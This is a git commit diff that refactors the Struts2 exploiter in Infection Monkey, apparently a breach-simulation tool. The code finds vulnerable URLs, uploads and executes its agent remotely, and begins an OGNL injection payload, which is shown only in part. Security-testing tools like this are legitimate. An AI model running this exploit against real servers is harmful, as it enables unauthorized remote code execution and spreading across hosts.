Struts2 refactored for framework fixes

2018-08-10 15:04:23 +03:00 · 2018-08-10 15:04:23 +03:00 · beb8dfed92
parent 8d7221eada
commit beb8dfed92
1 changed files with 11 additions and 15 deletions
--- a/infection_monkey/exploit/struts2.py
+++ b/infection_monkey/exploit/struts2.py
@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE):
        super(Struts2Exploiter, self).__init__(host)

    def exploit_host(self):
-        # We need a reference to the exploiter for WebRCE framework to use
-        exploiter = self.exploit
        # Get open ports
-        ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
+        ports = self.get_ports_w(self.HTTP, ["http"])
        if not ports:
            return False
        # Get urls to try to exploit
-        urls = WebRCE.build_potential_urls(self.host, ports)
+        urls = self.build_potential_urls(ports)
        vulnerable_urls = []
        for url in urls:
            # Get full URL
            url = self.get_redirected(url)
-            if WebRCE.check_if_exploitable(exploiter, url):
+            if self.check_if_exploitable(url):
                vulnerable_urls.append(url)
        self._exploit_info['vulnerable_urls'] = vulnerable_urls
        if not vulnerable_urls:
            return False
-        # We need to escape backslashes for our exploiter
-        config = copy.deepcopy(self._config)
-        config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32)
-        config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64)

-        if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
+        if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
            return True

-        if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
+        if not self.set_host_arch(vulnerable_urls[0]):
            return False

-        data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0])
+        data = self.upload_monkey(vulnerable_urls[0])

        # We can't use 'if not' because response may be ''
-        if data is not False and data['response'] == False:
+        if data is not False and data['response'] is False:
            return False

-        if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
+        if self.change_permissions(vulnerable_urls[0], data['path']) is False:
            return False

-        if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
+        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
            return False

        return True
@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE):
        :param cmd: Code to try and execute on host
        :return: response
        """
+        cmd = re.sub(r"\\", r"\\\\", cmd)
+        cmd = re.sub(r"'", r"\\'", cmd)
        payload = "%%{(#_='multipart/form-data')." \
                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
                  "(#_memberAccess?" \